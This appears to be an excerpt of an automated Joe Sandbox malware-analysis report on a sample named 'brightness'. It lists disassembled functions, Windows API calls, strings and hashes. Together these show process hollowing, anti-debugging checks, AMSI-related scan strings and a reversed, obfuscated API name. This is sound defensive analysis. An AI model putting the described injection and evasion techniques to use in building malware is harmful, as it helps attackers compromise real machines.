                                                                                                                                                                          • Instruction Fuzzy Hash: 2024E734A1026C8FDB10EBA4DCD0ADE73F6BFD5304F1054E1A509A7299DE70AE9A8F54

                                                                                                                                                                          Control-flow Graph
                                                                                                                                                                          • Function graph starting at 2918ba8 (node legend: Executed, Not Executed)
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0291881C: LoadLibraryA.KERNEL32(00000000,00000000,02918903), ref: 02918850
                                                                                                                                                                            • Part of subcall function 0291881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02918903), ref: 02918860
                                                                                                                                                                            • Part of subcall function 0291881C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 02918879
                                                                                                                                                                            • Part of subcall function 0291881C: FreeLibrary.KERNEL32(74AE0000,00000000,02962388,Function_000065D8,00000004,02962398,02962388,000186A3,00000040,0296239C,74AE0000,00000000,00000000,00000000,00000000,02918903), ref: 029188E3
                                                                                                                                                                            • Part of subcall function 029185D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02918660
                                                                                                                                                                          • GetThreadContext.KERNEL32(000008A8,02962420,ScanString,029623A4,0291A774,UacInitialize,029623A4,0291A774,ScanBuffer,029623A4,0291A774,ScanBuffer,029623A4,0291A774,UacInitialize,029623A4), ref: 0291943A
                                                                                                                                                                            • Part of subcall function 0291824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 029182BD
                                                                                                                                                                            • Part of subcall function 029184BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02918521
                                                                                                                                                                            • Part of subcall function 029179AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02917A1F
                                                                                                                                                                            • Part of subcall function 02917CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02917D6C
                                                                                                                                                                          • SetThreadContext.KERNEL32(000008A8,02962420,ScanBuffer,029623A4,0291A774,ScanString,029623A4,0291A774,Initialize,029623A4,0291A774,000008A4,0033BFF8,029624F8,00000004,029624FC), ref: 0291A14F
                                                                                                                                                                          • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(000008A8,00000000,000008A8,02962420,ScanBuffer,029623A4,0291A774,ScanString,029623A4,0291A774,Initialize,029623A4,0291A774,000008A4,0033BFF8,029624F8), ref: 0291A15C
                                                                                                                                                                            • Part of subcall function 02918798: LoadLibraryW.KERNEL32(bcrypt,?,000008A8,00000000,029623A4,0291A3BF,ScanString,029623A4,0291A774,ScanBuffer,029623A4,0291A774,Initialize,029623A4,0291A774,UacScan), ref: 029187AC
                                                                                                                                                                            • Part of subcall function 02918798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029187C6
                                                                                                                                                                            • Part of subcall function 02918798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A8,00000000,029623A4,0291A3BF,ScanString,029623A4,0291A774,ScanBuffer,029623A4,0291A774,Initialize), ref: 02918802
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Library$MemoryThreadVirtual$AddressContextFreeLoadProc$AllocateCreateHandleModuleProcessReadResumeSectionUnmapUserViewWrite
                                                                                                                                                                          • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                                                          • API String ID: 4083799063-51457883
                                                                                                                                                                          • Opcode ID: 33e5815baaa37e7fe7a3f7e7df54379b5daac98f0035b8f8008de7d02d12469e
                                                                                                                                                                          • Instruction ID: 5f4ef1d2315ab037d83aec5a3eb6b19b1a3c8b4423e1991ff0a70a33a07c0106
                                                                                                                                                                          • Opcode Fuzzy Hash: 33e5815baaa37e7fe7a3f7e7df54379b5daac98f0035b8f8008de7d02d12469e
                                                                                                                                                                          • Instruction Fuzzy Hash: 74E20530E0111C9FDB11EBA5CCD4EDEB3FAAFC5710F1095A1A609AB295DA30AE46CF51

                                                                                                                                                                          Control-flow Graph
                                                                                                                                                                          • Function graph starting at 2918ba6 (node legend: Executed, Not Executed)
call 290480c call 290494c call 2904798 call 290494c call 2918798 call 290480c call 290494c call 2904798 call 290494c call 2918798 call 290480c call 290494c call 2904798 call 290494c call 2918798 call 290480c call 290494c call 2904798 call 290494c call 2918798 call 2917ecc call 2918798 * 2 8353->8407 8354->8324 8406->8407 8407->7888
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0291881C: LoadLibraryA.KERNEL32(00000000,00000000,02918903), ref: 02918850
                                                                                                                                                                            • Part of subcall function 0291881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02918903), ref: 02918860
                                                                                                                                                                            • Part of subcall function 0291881C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 02918879
                                                                                                                                                                            • Part of subcall function 0291881C: FreeLibrary.KERNEL32(74AE0000,00000000,02962388,Function_000065D8,00000004,02962398,02962388,000186A3,00000040,0296239C,74AE0000,00000000,00000000,00000000,00000000,02918903), ref: 029188E3
                                                                                                                                                                            • Part of subcall function 029185D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02918660
                                                                                                                                                                          • GetThreadContext.KERNEL32(000008A8,02962420,ScanString,029623A4,0291A774,UacInitialize,029623A4,0291A774,ScanBuffer,029623A4,0291A774,ScanBuffer,029623A4,0291A774,UacInitialize,029623A4), ref: 0291943A
                                                                                                                                                                            • Part of subcall function 0291824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 029182BD
                                                                                                                                                                            • Part of subcall function 029184BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02918521
                                                                                                                                                                            • Part of subcall function 029179AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02917A1F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LibraryMemoryVirtual$AddressAllocateContextCreateFreeHandleLoadModuleProcProcessReadSectionThreadUnmapUserView
                                                                                                                                                                          • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                                                          • API String ID: 2852987580-51457883
                                                                                                                                                                          • Opcode ID: 68f97b4b3c60256c30ec4d7434e225a77876995156b32c91c7dd0d46420366c7
                                                                                                                                                                          • Instruction ID: 4cc34e069a4ef96ce4d7a52542cc1e84b25c8ed55303bf02de5672927d16ec39
                                                                                                                                                                          • Opcode Fuzzy Hash: 68f97b4b3c60256c30ec4d7434e225a77876995156b32c91c7dd0d46420366c7
                                                                                                                                                                          • Instruction Fuzzy Hash: 64E20530E0111C9FDB11EBA5CCD4EDEB3FAAFC5710F1095A1A609AB295DA30AE46CF51

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          control_flow_graph (node and edge list omitted): function 2905a78-2905ca5; the calls it names are those listed under APIs.
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02900000,0292E790), ref: 02905A94
                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02900000,0292E790), ref: 02905AB2
                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02900000,0292E790), ref: 02905AD0
                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02905AEE
                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02905B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02905B37
                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,02905CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02905B7D,?,80000001), ref: 02905B55
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,02905B84,00000000,?,?,00000000,02905B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02905B77
                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02905B94
                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02905BA1
                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02905BA7
                                                                                                                                                                          • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02905BD2
                                                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02905C19
                                                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02905C29
                                                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02905C51
                                                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02905C61
                                                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02905C87
                                                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02905C97
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                                                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                          • API String ID: 1759228003-2375825460
                                                                                                                                                                          • Opcode ID: c93b178950f295db8e739cb85c0c15ae581e8f4e62a1260b4f11a966a60bede7
                                                                                                                                                                          • Instruction ID: 4e11b2950730cac7940661eb4169723310cf8899d0d42d928bea30d71b075580
                                                                                                                                                                          • Opcode Fuzzy Hash: c93b178950f295db8e739cb85c0c15ae581e8f4e62a1260b4f11a966a60bede7
                                                                                                                                                                          • Instruction Fuzzy Hash: D4518571A4021C7EFF25D6A4CCC6FEF77ADAB48744F8101A5BA04E61C1D7749A448F64

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          control_flow_graph (node and edge list omitted): function 2918798-291880d; the calls it names are those listed under APIs.
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryW.KERNEL32(bcrypt,?,000008A8,00000000,029623A4,0291A3BF,ScanString,029623A4,0291A774,ScanBuffer,029623A4,0291A774,Initialize,029623A4,0291A774,UacScan), ref: 029187AC
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029187C6
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A8,00000000,029623A4,0291A3BF,ScanString,029623A4,0291A774,ScanBuffer,029623A4,0291A774,Initialize), ref: 02918802
                                                                                                                                                                            • Part of subcall function 02917CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02917D6C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                                                                          • String ID: BCryptVerifySignature$bcrypt
                                                                                                                                                                          • API String ID: 1002360270-4067648912
                                                                                                                                                                          • Opcode ID: fc8d4f475f1b749acc3e78dcaf86a7b57573fc5454f922aca20ec3120489a8fa
                                                                                                                                                                          • Instruction ID: 2ea4dded3dab55b8a8e78fbf68de6467e3bdf96fb4adbda9fc7faeec063b1a13
                                                                                                                                                                          • Opcode Fuzzy Hash: fc8d4f475f1b749acc3e78dcaf86a7b57573fc5454f922aca20ec3120489a8fa
                                                                                                                                                                          • Instruction Fuzzy Hash: C7F0C871E8C3185EF310AB69A88CF3637DCA7C2B14F08092DF91887180E77414208B50

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          control_flow_graph (node and edge list omitted): function 291f024-291f072; the calls it names are those listed under APIs.
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(KernelBase), ref: 0291F034
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0291F046
                                                                                                                                                                          • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0291F05D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                                                                                                          • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                                                                          • API String ID: 35162468-539270669
                                                                                                                                                                          • Opcode ID: b51ab51fb62bfd3369e1697ad85aaa7b37660fa5fcba121698d871ce63c95a8d
                                                                                                                                                                          • Instruction ID: a7a13436bbc3e65764345aa5bbde893b6faecf7a4d2e49acf2208aa2fa73eba0
                                                                                                                                                                          • Opcode Fuzzy Hash: b51ab51fb62bfd3369e1697ad85aaa7b37660fa5fcba121698d871ce63c95a8d
                                                                                                                                                                          • Instruction Fuzzy Hash: B0F0A93090435CAEEB10B6EA88887EDFBBD9B15338FA443D4A465A25C1E7B10690C6A1

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 02904ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02904EDA
                                                                                                                                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0291E0B4), ref: 0291E01F
                                                                                                                                                                          • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0291E0B4), ref: 0291E04F
                                                                                                                                                                          • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0291E064
                                                                                                                                                                          • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0291E090
                                                                                                                                                                          • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0291E099
                                                                                                                                                                            • Part of subcall function 02904C0C: SysFreeString.OLEAUT32(0291ED84), ref: 02904C1A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1897104825-0
                                                                                                                                                                          • Opcode ID: 3db2c54e27a9a126d69a1edd1bb573befacfd3a1c2c750cbaa28f7a2b03716a9
                                                                                                                                                                          • Instruction ID: 3159c1bc5d5f9d7cb79f3102c554aacf56415d262cf26d2d5605c723120981c5
                                                                                                                                                                          • Opcode Fuzzy Hash: 3db2c54e27a9a126d69a1edd1bb573befacfd3a1c2c750cbaa28f7a2b03716a9
                                                                                                                                                                          • Instruction Fuzzy Hash: 8221C175A5030CBEEB11EAE5CC86FDE77BDAB48B00F500461B704F71C0D6B4AA058B65

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0291E86A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CheckConnectionInternet
                                                                                                                                                                          • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                                                          • API String ID: 3847983778-3852638603
                                                                                                                                                                          • Opcode ID: f90ebd11f290b0d65aa0a78a754de1924a0f71e77191d0db5ad0ac59d17876c8
                                                                                                                                                                          • Instruction ID: 24458253fe883ce08c1f6c40a0a1b31262dc327d5f4291469f636fb7bbd63e5e
                                                                                                                                                                          • Opcode Fuzzy Hash: f90ebd11f290b0d65aa0a78a754de1924a0f71e77191d0db5ad0ac59d17876c8
                                                                                                                                                                          • Instruction Fuzzy Hash: F941F735B1020C9FEB00FBA5D881E9EB7FAEFC8710F215475EA51A7284EA70AD018F50

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 02904ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02904EDA
                                                                                                                                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0291DFD2), ref: 0291DF3F
                                                                                                                                                                          • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0291DF79
                                                                                                                                                                          • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0291DFA6
                                                                                                                                                                          • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0291DFAF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3764614163-0
                                                                                                                                                                          • Opcode ID: de9718cb2e20fad5bee2c32f0cec2fba3f1e84e46b53b8c01f34ce9a0a3db8cb
                                                                                                                                                                          • Instruction ID: a0d586f2a98f7e868b740fb46bbd0c80f876c5fc4a9a68902a3b036a0ba217ad
                                                                                                                                                                          • Opcode Fuzzy Hash: de9718cb2e20fad5bee2c32f0cec2fba3f1e84e46b53b8c01f34ce9a0a3db8cb
                                                                                                                                                                          • Instruction Fuzzy Hash: 0B21EA71A4030CBEEB10EAE0CC82F9EB7BDAB44B00F604161B604F71C0D7B4AF048AA5
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02918088,?,?,00000000,?,029179FE,ntdll,00000000,00000000,02917A43,?,?,00000000), ref: 02918056
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNELBASE(?), ref: 0291806A
                                                                                                                                                                            • Part of subcall function 029180C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02918148,?,?,00000000,00000000,?,02918061,00000000,KernelBASE,00000000,00000000,02918088), ref: 0291810D
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02918113
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(?,?), ref: 02918125
                                                                                                                                                                          • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02917A1F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                                                          • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                                                          • API String ID: 4072585319-445027087
                                                                                                                                                                          • Opcode ID: cdba9609a18d4180e4e1baf20518f2a4aa9b8e90d8ca91b069a0d67afca34093
                                                                                                                                                                          • Instruction ID: 17522a617635197b7dddfc0365bffd99ccc14c04c176a3f57f16175673bf527e
                                                                                                                                                                          • Opcode Fuzzy Hash: cdba9609a18d4180e4e1baf20518f2a4aa9b8e90d8ca91b069a0d67afca34093
                                                                                                                                                                          • Instruction Fuzzy Hash: 0E115E7564020DAFEB00EFA5DC81EEEB7EDEB89710F414464F904D7280D730AA148B60
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02918088,?,?,00000000,?,029179FE,ntdll,00000000,00000000,02917A43,?,?,00000000), ref: 02918056
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNELBASE(?), ref: 0291806A
                                                                                                                                                                            • Part of subcall function 029180C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02918148,?,?,00000000,00000000,?,02918061,00000000,KernelBASE,00000000,00000000,02918088), ref: 0291810D
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02918113
